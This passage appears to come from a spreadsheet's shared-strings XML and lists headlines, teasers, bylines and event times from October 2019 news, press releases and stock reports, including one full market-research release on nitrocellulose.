    <t>COLUMBUS, Ohio — Joe Biden is punching left and right coming out of the Democrats’ latest presidential debate, casting his top primary...</t>
  </si>
  <si>
    <t>Paolo Bossi</t>
  </si>
  <si>
    <t>Osborne Clarke advised the Darmstädter bauverein AG on tenancy, energy and corporate law in the establishment of its new joint venture –...</t>
  </si>
  <si>
    <t>NEW YORK (AP) — Ford and Mahindra are joining forces to expand the American automaker's presence in India and develop electric vehicles for...</t>
  </si>
  <si>
    <t>DUBLIN, Oct. 15, 2019 /PRNewswire/ -- A new report has found that Artificial Intelligence (AI) research produced by the ADAPT SFI Research...</t>
  </si>
  <si>
    <t>Amy Steele</t>
  </si>
  <si>
    <t>Triumph Bancorp (NASDAQ:TBK) and Southside Bancshares (NASDAQ:SBSI) are both small-cap finance companies, but which is the superior...</t>
  </si>
  <si>
    <t>New York Post, News Corp Australia Network</t>
  </si>
  <si>
    <t>US President Donald Trump’s approvalrating has risen to 49 per cent — its highest mark this year, according to a new poll. Despite the...</t>
  </si>
  <si>
    <t>The Turkey country-specific ETF jumped Thursday after Ankara agreed on a ceasefire in northern Syria to allow Kurdish forces to retreat...</t>
  </si>
  <si>
    <t>National facebookSHARE twitterTWEET email whatsapp A man has been jailed by WA's District Court for attacks on a teenager and a...</t>
  </si>
  <si>
    <t>by Taryn Bray @tarynbray / WashingtonCaps.com</t>
  </si>
  <si>
    <t>It was 1995 and things were a lot different</t>
  </si>
  <si>
    <t>TEGNA</t>
  </si>
  <si>
    <t>The film is due out in 2021.</t>
  </si>
  <si>
    <t>Larissa Nath</t>
  </si>
  <si>
    <t>…</t>
  </si>
  <si>
    <t>Equities analysts predict that Alkermes Plc (NASDAQ:ALKS) will report sales of $250.98 million for the current quarter, according to Zacks....</t>
  </si>
  <si>
    <t>GLEN BURNIE, Md., Oct. 11, 2019 (GLOBE NEWSWIRE) -- Glen Burnie Bancorp (NASDAQ: GLBZ), parent company of The Bank of Glen Burnie®,...</t>
  </si>
  <si>
    <t>Source: Carol Bischoff</t>
  </si>
  <si>
    <t>Published on October 17th, 2019 There are many famous inventions that had their beginning in a garage, ranging from Apple and Disney to...</t>
  </si>
  <si>
    <t>Drake's OVO label has been relatively stagnant this year, with the exception of the Top Boy soundtrack, and the previously released Drake...</t>
  </si>
  <si>
    <t>Maverick Capital Ltd. grew its position in shares of Apple Inc. (NASDAQ:AAPL) by 48.2% during the second quarter, according to its most...</t>
  </si>
  <si>
    <t>Martin Crutsinger, Ap Economics Writer</t>
  </si>
  <si>
    <t>In this Aug. 21, 2019, photo a worker stocks a produce stand at a metro station in Atlanta. On Thursday, Oct. 10, the Labor Department...</t>
  </si>
  <si>
    <t>LOS ANGELES (AP) — Investigators say a man driving Kevin Hart's vintage muscle car accelerated recklessly on a Southern California highway,...</t>
  </si>
  <si>
    <t>A peculiar case was made public today</t>
  </si>
  <si>
    <t>by Jeffrey Wells</t>
  </si>
  <si>
    <t>Name me one other hotshot critic-columnist in this country or even on this continent who’s paid $26 and change to re-experience a film that...</t>
  </si>
  <si>
    <t>BROOKLYN, N.Y., Oct. 4, 2019 /PRNewswire-PRWeb/ -- October 4, 2019 Magic + Co., the world's most experienced voice services agency, founded...</t>
  </si>
  <si>
    <t>Vivienne Jones</t>
  </si>
  <si>
    <t>As part of mental health month a contemporary play targeting mental health issues in rural Australia is coming to Albury. Carpe Diem...</t>
  </si>
  <si>
    <t>Oct, Fri 11 2019 - 6:00 PM to 10:00 PM</t>
  </si>
  <si>
    <t>SCOTTSDALE, Ariz., Oct. 9, 2019 /PRNewswire/ -- Acronis SCS, a leading American cyber protection and edge data security company, yesterday...</t>
  </si>
  <si>
    <t>Patricia G. Balona, Daytona News-Journal</t>
  </si>
  <si>
    <t>A man who got a hotel room over the weekend to have some cuddling time with a Daytona Beach woman ended up getting robbed by the woman and...</t>
  </si>
  <si>
    <t>GREEN BAY — Nathaniel Hackett can claim all he wants that he feels “great” — yes, that’s the word the Green Bay Packers offensive...</t>
  </si>
  <si>
    <t>from Oct, Sat 19 2019 - 7:00 PM</t>
  </si>
  <si>
    <t>NEW YORK, Oct. 14, 2019 /PRNewswire/ -- Irritable Bowel Syndrome (IBS) Therapeutics market worldwide is projected to grow by US$4 Billion,...</t>
  </si>
  <si>
    <t>SAN ANTONIO, Oct. 02, 2019 (GLOBE NEWSWIRE) -- bioAffinity Technologies, a privately held biotech company, today announced the members of...</t>
  </si>
  <si>
    <t>Marsha Hunter</t>
  </si>
  <si>
    <t>Eleanor Tomlinson Arrive at Loyalty and Love Rankin Exhibition in London 10-02-2019 You might also Like… Kaia Gerber – Stepped Out in...</t>
  </si>
  <si>
    <t>The "Global Direct Current (DC) Programmable Power Supplies and DC Electronics Loads Market, Forecast to 2024" report has been added to...</t>
  </si>
  <si>
    <t>By Obadiah Mailafia Last week, Army Chief Lt.-General Tukur Buratai raised eyebrows when he advocated the use of prayers and “spiritual...</t>
  </si>
  <si>
    <t>Dundo, ANGOLA, October 10 - The United Nations High Commissioner for Refugees (UNHCR) in Angola has created two transit centers to...</t>
  </si>
  <si>
    <t>Arcadia Inc</t>
  </si>
  <si>
    <t>LONDON, Oct. 1, 2019 /PRNewswire/ -- With the rise in digital disruption and as a result big data, organizations from FMCG to survey...</t>
  </si>
  <si>
    <t>The Schall Law Firm, a national shareholder rights litigation firm, announces the filing of a class action lawsuit against Vivint Solar,...</t>
  </si>
  <si>
    <t>Caroline Mortimer</t>
  </si>
  <si>
    <t>Britishforeign minister Dominic Raab is set to call US Secretary of State Mike Pompeo over the case of an American diplomat's wife who used...</t>
  </si>
  <si>
    <t>Donna Armstrong</t>
  </si>
  <si>
    <t>Invesco Ltd. boosted its position in shares of Franklin Street Properties Corp. (NYSEAMERICAN:FSP) by 6.8% in the 2nd quarter,...</t>
  </si>
  <si>
    <t>MONTREAL, Oct. 17, 2019 (GLOBE NEWSWIRE) -- Throughout Quebec, but particularly in Montreal, businesses pay much higher property tax...</t>
  </si>
  <si>
    <t>Toronto, ON, Oct. 15, 2019 (GLOBE NEWSWIRE) -- via NEWMEDIAWIRE -- Amfil Technologies Inc. (OTC: FUNN) is pleased to announce the...</t>
  </si>
  <si>
    <t>$2.9 million in Community Resiliency Grants will build ecosystem resilience, amid increase in natural disasters SAN FRANCISCO --(BUSINESS...</t>
  </si>
  <si>
    <t>CLOSE Many agencies in Anderson were closed on Wednesday, Oct. nine, 2019, because of the PG&amp;E power outage. The Papa Murphy's has an...</t>
  </si>
  <si>
    <t>Anglo American plc (LON:AAL) insider Stephen Pearce purchased 7 shares of the business’s stock in a transaction on Monday, October 14th....</t>
  </si>
  <si>
    <t>October 07, 2019 - /PressAdvantage/ - Girl Scouts of Texas Oklahoma Plains has recently partnered with Flourish Change, an app that lets...</t>
  </si>
  <si>
    <t>By W.G. RAMIREZ</t>
  </si>
  <si>
    <t>LAS VEGAS -- Reilly Smith had two goals, Cody Glass scored the first of his career and the Vegas Golden Knights beat the San Jose Sharks...</t>
  </si>
  <si>
    <t>David Warner will look to capitalise after surviving on a day where the lesser-knowns, not the Test stars, shone in Queensland's Sheffield...</t>
  </si>
  <si>
    <t>Seth Conners</t>
  </si>
  <si>
    <t>Wall Street analysts have the ability to provide stock ratings for companies that they track. Based on analysts used by Zacks Research, the...</t>
  </si>
  <si>
    <t>When it comes to business building, expertise and years of experience prove to be some of the important elements. As business owners and...</t>
  </si>
  <si>
    <t>Thomas Penny and Robert Hutton</t>
  </si>
  <si>
    <t>(Bloomberg) -- Queen Elizabeth II delivered a speech outlining the U.K. government’s program in Parliament on Monday as Boris Johnson laid...</t>
  </si>
  <si>
    <t>Holly Viers</t>
  </si>
  <si>
    <t>WEBER CITY — Many children in Scott County will need new socks and shoes as cold weather approaches.</t>
  </si>
  <si>
    <t>by WRGB STAFF</t>
  </si>
  <si>
    <t>ALBANY, N.Y. (WRGB) - A man pleaded guilty to shooting someone inside of a taxi cab in Albany. Thomas Allen pleaded guilty to felony...</t>
  </si>
  <si>
    <t>Jim Tucker in Tokyo, The Courier-Mail</t>
  </si>
  <si>
    <t>Semi Radradra’s stunning display of line-splitting pace, power and panache has rewritten the rankings of the studs and duds to cross from...</t>
  </si>
  <si>
    <t>By The Secret Scout For The Daily Mail</t>
  </si>
  <si>
    <t>The Secret Scout takes a look at Southampton midfielder Callum Slattery The English midfielder controlled possession and looked like a...</t>
  </si>
  <si>
    <t>With the development of modern industry, industrial caster wheels have become increasingly visible. Yutong often says that industrial...</t>
  </si>
  <si>
    <t>Associated Press CLEVELAND — The Browns are even taking hits off the field. Star defensive end Myles Garrett said he was punched in the...</t>
  </si>
  <si>
    <t>By Kerri-Ann Roper, PA Entertainment Editor</t>
  </si>
  <si>
    <t>Alesha Dixon has shared the first picture of her seven-week-old baby daughter as she also celebrates turning 41. The Britain’s Got Talent...</t>
  </si>
  <si>
    <t>iQ4 Corp’s Virtual Apprenticeship “in-a-box” is a turnkey program that will help certify 10,000 new cybersecurity workers in three years...</t>
  </si>
  <si>
    <t>DETROIT, Oct. 9, 2019 /PRNewswire/ -- Today, the Friends of the Rouge (FOTR) and the Fort-Rouge Gateway Coalition (FRoG) will commemorate...</t>
  </si>
  <si>
    <t>Sky Ranch by The New Home Company (NEW HOME, NYSE: NWHM) earned two top design honors at last weekend’s SoCal Awards—the annual gala that...</t>
  </si>
  <si>
    <t>PHOENIX, Oct. 16, 2019 /PRNewswire-PRWeb/ -- "I've seen first hand the global growth in the transportation industry though our taxi call...</t>
  </si>
  <si>
    <t>TUNIS, Tunisia (AP) — A media mogul and a former law professor who are vying to be Tunisia's next president sparred during a televised...</t>
  </si>
  <si>
    <t>DES MOINES, Iowa (AP) — The Trump administration says it plans to implement new rules that will increase demand for ethanol, reversing a...</t>
  </si>
  <si>
    <t>Oct, Thu 10 2019 - 4:00 PM to 8:30 PM</t>
  </si>
  <si>
    <t>The majority ownership deal shows Uber is continuing to diversify from its core ridesharing business.</t>
  </si>
  <si>
    <t>Orlando Ortega (r) was awarded a bronze medal in the 110m hurdles after being impeded in the final. Spain's Orlando Ortega has been awarded...</t>
  </si>
  <si>
    <t>/PRNewswire/ -- According to latest report "Nitrocellulose Market by Application (Automotive Paints, Printing Inks, Leather Finishes, Wood Coatings, Nail Varnish), Regional Outlook, Price Trends, Competitive Market Share &amp; Forecast, 2019?2025", by Global Market Insights, Inc., the worldwide nitrocellulose market revenue will reach US$1 billion by 2025. Changing fashion trends and rising consumer expenditure on high quality clothing has surged the demand for comfortable, multifunctional apparels &amp; footwear which is likely to enhance nitrocellulose market value. Leather products require high gloss or matte finishes to enhance their appearance and to provide protection against heat and moisture, which helps the cellulose nitrate industry. Request for a sample of this research report @ https://www.gminsights.com/request-sample/detail/386 Higher levels of nitrocellulose in nail varnishes, one of its major applications, contribute to a more flexible film which improves the durability of the end-use product. Nail polish sales were over USD 565 million in 2018, accounting for almost 50% of nail products market in the U.S., which shows favorable trend for nitrocellulose market. North America nail varnish market may spur at over USD 25 million up to 2025. Ongoing development of automotive industry in European region has boosted the demand for high quality auto paints, another important application of nitrocellulose. Europe automotive paints market valued over USD 40 million in 2018. Make an Inquiry for purchasing this report @ https://www.gminsights.com/inquiry-before-buying/386 Cellulose nitrate in automotive paints offers a glossy finish to automobiles, imparts optimum functionality &amp; flexibility and fast drying properties. These high-performance paints have low volatile organic compound in comparison to traditional oil based paints which enhances their durability. In addition, companies are focusing on development of automotive paints that are eco-friendly owing to rising concerns over toxic gases emissions which may favor market demand of nitrocellulose. The nitrocellulose companies are concentrating towards new product development. Manufacturers are also indulged in joint ventures and partnerships to reinforce their product portfolio. Some key players include DuPont Specialty Solutions, Hebei Sanmu Cellulose, EURENCO, Nitrex Chemicals India and Nitro Quimica. Browse complete summary from this report @ https://www.gminsights.com/industry-analysis/nitrocellulose-market-report Chapter 3 Nitrocellulose Market Insights ? from Table of Contents (ToC) of the report: 3.1 Industry segmentation 3.2 Industry landscape, 2014 - 2025 3.3 Industry ecosystem analysis 3.3.1 Vendor matrix 3.3.2 Distribution channel analysis 3.3.2.1 Collaboration/Partnership 3.3.2.2 Technology Provider 3.3.2.3 Distributors 3.4 Regulatory landscape 3.4.1 U.S. 3.4.1.1 49 CFR 100 ? 177 3.4.1.2 21CFR177.1200 3.4.2 Europe 3.4.2.1 Directive 2008/98/EC Of the European Parliament and the Council 3.4.3 China 3.4.3.1 China State Council Decree 591 3.5 Pricing analysis 3.6 Technology landscape 3.7 Raw material analysis 3.7.1 Wood pulp 3.7.2 Nitric Acid 3.7.3 Sulfuric Acid 3.8 Industry impact forces 3.8.1 Growth drivers 3.8.1.1 North America: Rising demand from furniture industry 3.8.1.2 Europe: Significant demand from automotive paints industry 3.8.1.3 Asia Pacific: Increasing printing inks application 3.8.2 Industry pitfall &amp; challenges 3.8.2.1 Strict regulatory compliance 3.8.2.2 Growing use of substitutes in molecular biology 3.9 Growth potential analysis, 2018 3.9.1 Emerging business models 3.9.1.1 Acquisitions 3.9.1.2 New product launch 3.10 Innovation &amp; sustainability 3.11 Porter's analysis 3.12 Competitive landscape, 2018 3.12.1 Company market share analysis, 2018 3.12.2 Strategy dashboard 3.13 PESTEL analysis Browse Complete Table of Contents (ToC) @ https://www.gminsights.com/toc/detail/nitrocellulose-market-report About Global Market Insights Global Market Insights, Inc., headquartered in Delaware, U.S., is a global market research and consulting service provider; offering syndicated and custom research reports along with growth consulting services. Our business intelligence and industry research reports offer clients with penetrative insights and actionable market data specially designed and presented to aid strategic decision making. These exhaustive reports are designed via a proprietary research methodology and are available for key industries such as chemicals, advanced materials, technology, renewable energy and biotechnology. Contact Us: Arun Hegde Corporate Sales, USA Global Market Insights, Inc. Phone: 1-302-846-7766 Toll Free: 1-888-689-0688 Email: sales@gminsights.com Related Images by-2025-nitrocellulose-market-to.png By 2025, Nitrocellulose Market to hit USD 1 Billion Rising petroleum derivatives cost and stringent government regulations have urged manufacturers to revise their paints &amp; coatings formulations to meet changing regulation requirements which shall support nitrocellulose market growth. Related Links Bleached Linter Cellulose Market Size Cellulose Gum Market Size</t>
  </si>
  <si>
    <t>Khademul Islam</t>
  </si>
  <si>
    <t>Book review</t>
  </si>
  <si>
    <t>The global automotive actuators market is expected to post a CAGR of over 8% during 2019-2023, according to the latest market research...</t>
  </si>
  <si>
    <t>btarunr</t>
  </si>
  <si>
    <t>Montech, a new enthusiast PC Case, Power and Cooling solutions brand based in Taiwan introduces their new high performance Z3 ARGB 3-in-1...</t>
  </si>
  <si>
    <t>WASHINGTON (AP) — A museum dedicated to journalism and the First Amendment is set to close its doors near the National Mall by the end of...</t>
  </si>
  <si>
    <t>DUBLIN--(BUSINESS WIRE)--The "PreK-12 Policy &amp; Budget Outlook, 2019-2020" report has been added to ResearchAndMarkets.com's offering....</t>
  </si>
  <si>
    <t>Lisa Matthews</t>
  </si>
  <si>
    <t>Treasurer of the State of North Carolina lessened its position in shares of CDW (NASDAQ:CDW) by 0.9% during the 2nd quarter, according to...</t>
  </si>
  <si>
    <t>by Jana Barnello</t>
  </si>
  <si>
    <t>SYRACUSE, N.Y. — Onondaga County’s Democratic Elections Commissioner Dustin Czarny will not face criminal charges after being accused of...</t>
  </si>
  <si>
    <t>Pharmacy Times Continuing Education™ (PTCE), a leader in continuing education for retail, health-system, managed care, oncology and...</t>
  </si>
  <si>
    <t>Share this article NEW YORK, Oct. 16, 2019 /PRNewswire/ -- Phenol market worldwide is projected to grow by US$7.9 Billion, driven by a...</t>
  </si>
  <si>
    <t>Things got dark for the NFL as a whole when Patrick Mahomes left Thursday Night Football against the Denver Broncos with a dislocated...</t>
  </si>
  <si>
    <t>Originally posted on Pro Football Rumors</t>
  </si>
  <si>
    <t>The Bears have placed defensive tackle Akiem Hicks on injured reserve, according to a team announcement. Hicks has been soliciting medical...</t>
  </si>
  <si>
    <t>Reuters Editorial</t>
  </si>
  <si>
    <t>Oct 17 (Reuters) - Swiss government: * WILL STRESS NEED FOR PREDICTABLE TRADE POLICIES AND IMPROVED FRAMEWORK CONDITIONS IN DEVELOPING...</t>
  </si>
  <si>
    <t>Gus McCubbing, Australian Associated Press</t>
  </si>
  <si>
    <t>A man who was impaled on a garden stake after he fell off a roof in the NSW Hunter region has been flown to hospital with the stake still...</t>
  </si>
  <si>
    <t>Michael Holden</t>
  </si>
  <si>
    <t>British Prime Minister Boris Johnson will send a letter to the EU asking for a Brexit delay if no divorce deal has been reached by October...</t>
  </si>
  <si>
    <t>The parents of a boy who died after contracting HIV through contaminated blood products have told an inquiry that while MPs shout about...</t>
  </si>
  <si>
    <t>State College, PA, Oct. 15, 2019 (GLOBE NEWSWIRE) -- Attendees at the fourth annual Minitab Global Insights experienced a one-of-a-kind...</t>
  </si>
  <si>
    <t>Sports Illustrated is undergoing drastic workforce cuts. Today, the venerable media outlet trimmed as many as 40 group of workers...</t>
  </si>
  <si>
    <t>By STEVEN WINE AP Sports Writer</t>
  </si>
  <si>
    <t>Miami Dolphins head coach Brian Flores follows a play, during the second half at an NFL football game against the Washington Redskins,...</t>
  </si>
  <si>
    <t>BOSTON, Oct. 1, 2019 /PRNewswire/ - The John Hancock Preferred Income Funds (NYSE: HPI, HPF, and HPS) (the "Funds"), closed-end funds...</t>
  </si>
  <si>
    <t>by Carlie Walker</t>
  </si>
  <si>
    <t>UPDATE: A man aged in his 40s was left with serious arm injuries after he was struck by a car on the Bruce Highway on Thursday night.</t>
  </si>
  <si>
    <t>UVA women’s soccer junior goalkeeper Laurel Ivory (Surfside, Fla.) has been named the ACC Defensive Player of the Week. Ivory helped...</t>
  </si>
  <si>
    <t>VANCOUVER, British Columbia, Oct. 15, 2019 (GLOBE NEWSWIRE) -- Fortuna Silver Mines Inc. (NYSE: FSM) (TSX: FVI) is pleased to report...</t>
  </si>
  <si>
    <t>GEARHARTVILLE — The monthly meeting of The Gearhartville Sportsman’s Club was held on Sept. 30 at 7 p.m. There were 11 members present....</t>
  </si>
  <si>
    <t>Tradingcharts.com Oct 07, 2019 (AB Digital via COMTEX) -- Market Insight The global IP telephony market is experiencing a golden period...</t>
  </si>
  <si>
    <t>The Globe and Mail reports in its Friday edition that Raymond James analyst Frederic Bastien says shares of WSP Global ($76.28) remain...</t>
  </si>
  <si>
    <t>The Chargers sit at 2-2, as they make their way through an early season similarly filled with struggles. Injuries have been their main...</t>
  </si>
  <si>
    <t>Posted 7:58 am, October 10, 2019, by Web Staff,</t>
  </si>
  <si>
    <t>KENTWOOD, Mich. – A young boy from Michigan who battled cancer nearly his whole life not only got quite the surprise, but he is surprising...</t>
  </si>
  <si>
    <t>The "Programmable Automation Controller - Global Market Outlook (2017-2026)" report has been added to ResearchAndMarkets.com's offering....</t>
  </si>
  <si>
    <t>By ROBERT CESSNA robert.cessna@theeagle.com</t>
  </si>
  <si>
    <t>Tua Tagovailoa could have thrown for 500 yards if top-ranked Alabama wasn’t so good returning kicks in Saturday’s 47-28 victory over No. 24...</t>
  </si>
  <si>
    <t>Matt Nagy was forced to go to the bullpen early on Sunday when starting quarterback Mitchell Trubisky was sidelined with a shoulder injury....</t>
  </si>
  <si>
    <t>Rene Ackley</t>
  </si>
  <si>
    <t>Investors sentiment decreased to 0.8 in Q2 2019. Its down 0.18, from 0.98 in 2019Q1. It dived, as 38 investors sold Danaher Corporation...</t>
  </si>
  <si>
    <t>2ndDivisionVet</t>
  </si>
  <si>
    <t>Since 2007, there have been three whole Spider-Man franchises. First Tobey Maguire, then Andrew Garfield, and now Tom Holland. In one...</t>
  </si>
  <si>
    <t>LL Corpus Cogere, Inc. announces the installation of the RehabWell: MINI CLINIC ™ at the Wells House of California, Inc. in Long Beach,...</t>
  </si>
  <si>
    <t>By Nicholas Gerbis</t>
  </si>
  <si>
    <t>Published: Thursday, October 17, 2019 - 4:57pm Tweet Veterinary College WEB_0.mp3 Download mp3 (965.6 KB) The University of Arizona has...</t>
  </si>
  <si>
    <t>Jonah Meadows, Patch Staff</t>
  </si>
  <si>
    <t>Patch asked suburban school district across the Chicago area how they handle bullying in their communities.</t>
  </si>
  <si>
    <t>Canada Pension Plan Investment Board grew its stake in Darling Ingredients Inc (NYSE:DAR) by 357.7% during the 2nd quarter, according to...</t>
  </si>
  <si>
    <t>WICHITA, Kan., Oct. 01, 2019 (GLOBE NEWSWIRE) -- Equity Bancshares, Inc. (NASDAQ:EQBK), (“Equity”), the Wichita-based holding company of...</t>
  </si>
  <si>
    <t>Robert Burns</t>
  </si>
  <si>
    <t>The United States has announced sanctions targeting Turkey's economy, in response to its incursion into Syria targeting Kurdish fighters,...</t>
  </si>
  <si>
    <t>Eager to upgrade the overall travel experience for its valued customers, EGYPTAIR has announced that its Cairo-Budapest flights will now...</t>
  </si>
  <si>
    <t>HONG KONG, CHINA / ACCESSWIRE / October 14, 2019 / A new case reported by investigators at the New York Medical Group and the University of...</t>
  </si>
  <si>
    <t>SAN DIEGO, Oct. 11, 2019 /PRNewswire/ -- Embellish PB -- an industry-leading beauty and cosmetic studio in San Diego teams up with...</t>
  </si>
  <si>
    <t>Camille Bains</t>
  </si>
  <si>
    <t>VANCOUVER — Hearing about the stabbing death of a 14-year-old boy outside a school in Hamilton has Darrel Crimeni grappling with questions...</t>
  </si>
  <si>
    <t>Arnold Schwarzenegger and Linda Hamilton shared a warm greeting as they kissed while promoting their new film Terminator: Dark Fate, nearly...</t>
  </si>
  <si>
    <t>HOLLYWOOD, CA / ACCESSWIRE / October 4, 2019 / Crowdfunding, SMS messaging, water infrastructure, hemp cigarettes, solar, Chinese...</t>
  </si>
  <si>
    <t>Raheem Sterling lined up as part of Manchester City’s midfield as the club looked to bounce back from their defeat to Wolves and move...</t>
  </si>
  <si>
    <t>T Sligo</t>
  </si>
  <si>
    <t>The short-sellers can taste blood. They are circling Kier Group (LSE: KIE), making it one of the most shorted stocks in the London market....</t>
  </si>
  <si>
    <t>IRVINE, Calif., Oct. 10, 2019 /PRNewswire/ -- In anticipation of his October 13, 2019 NASCAR Cup Series race at Talladega (Ala.)...</t>
  </si>
  <si>
    <t>Michael Carayannis, The Daily Telegraph</t>
  </si>
  <si>
    <t>Tepai Moeroa could quite easily be putting his feet up now as he prepares himself for his cross-code switch. But the NSW Waratahs bound...</t>
  </si>
  <si>
    <t>Dr. Burton Wagner</t>
  </si>
  <si>
    <t>At San Clemente Vitality, we believe in a holistic approach. We focus on each aspect of a person – physical, emotional, spiritual, social...</t>
  </si>
  <si>
    <t>New York, Oct. 11, 2019 (GLOBE NEWSWIRE) -- Reportlinker.com announces the release of the report "Global Chronic Obstructive Pulmonary...</t>
  </si>
  <si>
    <t>The report on the Global Artificial Intelligence (AI) in Supply Chain Market covers historical market trends, current market dynamics,...</t>
  </si>
  <si>
    <t>NEW YORK, Oct. 8, 2019 /PRNewswire-PRWeb/ -- 75 to 95% of youth in the juvenile justice system have experienced trauma and research...</t>
  </si>
  <si>
    <t>AIT News Desk</t>
  </si>
  <si>
    <t>AntWorks, the global provider of artificial intelligence and intelligent automation solutions powered by fractal science, announced its...</t>
  </si>
  <si>
    <t>GREEN BAY — Virtually every workday, since his blip-on-the-transaction-wire signing on May 6, Chandon Sullivan has walked past the large...</t>
  </si>
  <si>
    <t>Oliver Williams</t>
  </si>
  <si>
    <t>Police appeal after violent burglary at house in Balsall Common - Kenilworth Weekly News</t>
  </si>
  <si>
    <t>Matthew Norton</t>
  </si>
  <si>
    <t>The Federal Court has now released the first decision in which the scope of Section 53.1 of the Canadian Patent Act—the so-called “file...</t>
  </si>
  <si>
    <t>StatePoint Media</t>
  </si>
  <si>
    <t>SPONSORED CONTENT -- (StatePoint) Millennials are no strangers to watching numbers. Lives today are affected by a vast number of online and...</t>
  </si>
  <si>
    <t>We’ve partnered once again with Perfect World &amp; Cryptic to give away a special gift pack for Neverwinter on PC! Neverwinter : Uprising...</t>
  </si>
  <si>
    <t>British Prime Minister Boris Johnson has told Tayyip Erdogan that Britain has "grave concerns" about Turkey's military action in northern...</t>
  </si>
  <si>
    <t>SAN FRANCISCO, Oct. 18, 2019 (GLOBE NEWSWIRE) -- StreamSets®, provider of the industry’s first DataOps platform, announced today that it...</t>
  </si>
  <si>
    <t>Asian Dragon (CURRENCY:AD) traded 2.1% lower against the dollar during the twenty-four hour period ending at 11:00 AM ET on October 3rd....</t>
  </si>
  <si>
    <t>Turkish-backed Syrian opposition fighters celebrate in Akcakale, in Sanliurfa province advance, after entering over the border from Tal...</t>
  </si>
  <si>
    <t>jgoralski</t>
  </si>
  <si>
    <t>Josh Vitti evades a tackle on Southington’s opening drive to set up the first score in a 55-6 rout of Enfield. (Photo by John Goralski) By...</t>
  </si>
  <si>
    <t>Mackenzie Nichols</t>
  </si>
  <si>
    <t>(Video provided by Reuters) Diahann Carroll, the Tony-winning, Oscar-nominated singer and actress who paved the way for black actors by...</t>
  </si>
  <si>
    <t>BALTIMORE (4-2) at SEATTLE (5-1) Sunday, 4:25 p.m. EDT, FOX OPENING LINE — Seahawks by 3½. RECORD VS. SPREAD — Ravens 1-4-1, Seahawks...</t>
  </si>
  <si>
    <t>Sameer Suri For Dailymail.com</t>
  </si>
  <si>
    <t>Ali Wong has revealed why 'no topic is off limits' when it comes to her comedy. The 37-year-old covered the new issue of Health and...</t>
  </si>
  <si>
    <t>Meghan, Duchess of Sussex, has encouraged women to "keep shining brightly" and "know [their] worth". The 38-year-old royal - who was known...</t>
  </si>
  <si>
    <t>This aerial photo shows the Hard Rock Hotel, which was under construction, after a fatal partial collapse in New Orleans, Saturday, Oct....</t>
  </si>
  <si>
    <t>ReportLinker FR</t>
  </si>
  <si>
    <t>The global aircraft heat exchanger market was valued at US$ 1. 43 Bn in 2018 and is expected to reach US$ 2.</t>
  </si>
  <si>
    <t>SOURCE Cheapquotesautoinsurance.com Cheapquotesautoinsurance.com announces a new blog post, "How to Lower Car Insurance Rates by Dropping...</t>
  </si>
  <si>
    <t>The scope of this report includes an analysis of the electronic adhesives market based on resin type, product type, application and...</t>
  </si>
  <si>
    <t>That sounds good Pokemon Sword &amp; Defend is so shut we are able to nearly style it. Do not truly do this! Change carts style horrible...</t>
  </si>
  <si>
    <t>City also recognized in Top 10 Small Cities (Outside UK) list while Hacienda Temozon and Chable Resort and Spa rank in resort lists...</t>
  </si>
  <si>
    <t>By Frank Pallotta, CNN Business</t>
  </si>
  <si>
    <t>By Frank Pallotta, CNN Business Kevin Feige's Marvel universe is about to get even bigger.</t>
  </si>
  <si>
    <t>Matt Maloney</t>
  </si>
  <si>
    <t>The Tasmanian Greens say a government plan to outlaw pipes to smoke the drug ice will lead users to consider injection of the drug The...</t>
  </si>
  <si>
    <t>VANCOUVER — A luxury hotel in Vancouver has been granted a court injunction against striking workers using sirens to make noise outside the...</t>
  </si>
  <si>
    <t>Canada’s main stock index was on course to rise for the third day on Friday on robust domestic jobs data, and as hopes for a partial trade...</t>
  </si>
  <si>
    <t>WASHINGTON (AP) — President Donald Trump says he'll "be looking into" the case of a U.S. financial adviser charged with killing a hotel...</t>
  </si>
  <si>
    <t>James Wilkinson</t>
  </si>
  <si>
    <t>InterContinental Hotels Group (IHG) continues to grow at a rapid pace across the world through both the company’s legacy brands and recent...</t>
  </si>
  <si>
    <t>PRINCETON, N.J.--(BUSINESS WIRE)--Oct 15, 2019-- Sun Ophthalmics, the branded ophthalmic division of Sun Pharmaceuticals Industries Inc,...</t>
  </si>
  <si>
    <t>DAVID CRARY AP National Writer</t>
  </si>
  <si>
    <t>(AP) - The portion of Americans with no religious affiliation is rising significantly, in tandem with a sharp drop in the percentage that...</t>
  </si>
  <si>
    <t>The global smart sports equipment market is expected to post a CAGR of over 37% during the period 2019-2023, according to the latest market...</t>
  </si>
  <si>
    <t>WASHINGTON (AP) — US says it will impose tariffs on EU imports Oct. 18 after WTO gives green light in Airbus case....</t>
  </si>
  <si>
    <t>NEW YORK (WCBS/CNN) - Video posted to Instagram over the weekend shows a woman facing off with a lion at the Bronx Zoo, taunting the...</t>
  </si>
  <si>
    <t>OKLAHOMA CITY (AP) — Police in Oklahoma City say a suspect has been wounded in an officer-involved shooting on the city's northwest side....</t>
  </si>
  <si>
    <t>LONDON, Oct. 01, 2019 (GLOBE NEWSWIRE) -- Ferroglobe PLC (NASDAQ: GSM) (“Ferroglobe” or the “Company”) announced today that it has...</t>
  </si>
  <si>
    <t>ETRADE Capital Management LLC bought a new stake in Paramount Group Inc (NYSE:PGRE) during the second quarter, according to the company in...</t>
  </si>
  <si>
    <t>Nenad Kerkez</t>
  </si>
  <si>
    <t>Dear Traders, The AUD/JPY has formed a bearish pattern on MTF. We should see a downward move if the price stays below 73.25 The AUD/JPY...</t>
  </si>
  <si>
    <t>SANTA CLARA, Calif. --(BUSINESS WIRE) Blue Danube Systems, a provider of mobile wireless access solutions that significantly and...</t>
  </si>
  <si>
    <t>Oct, Tue 8 2019 - 8:00 PM to 10:00 PM</t>
  </si>
  <si>
    <t>AKRON, Ohio, Oct. 17, 2019 /PRNewswire/ -- The Goodyear Tire &amp; Rubber Company (NASDAQ: GT) will report third quarter 2019 financial results...</t>
  </si>
  <si>
    <t>Alaa Abdeldaiem</t>
  </si>
  <si>
    <t>The Tennessee Titans are starting quarterback Ryan Tannehill for Sunday's game against the Chargers, NFL Network's Ian Rapoport reported on...</t>
  </si>
  <si>
    <t>Ryanair can wait out price rises sought by planemakers since the global grounding of the Boeing 737 MAX, the Irish airline's boss said on...</t>
  </si>
  <si>
    <t>U.S. tariffs on European Union products will hit around 500 million euros ($547.40 million) of Italian agricultural products per year,...</t>
  </si>
  <si>
    <t>By Adam Stenning</t>
  </si>
  <si>
    <t>Albion suffered a 2-1 defeat to Aston Villa at Villa Park. The Seagulls took the lead in the 20th minute, when Pascal Gross' free-kick was...</t>
  </si>
  <si>
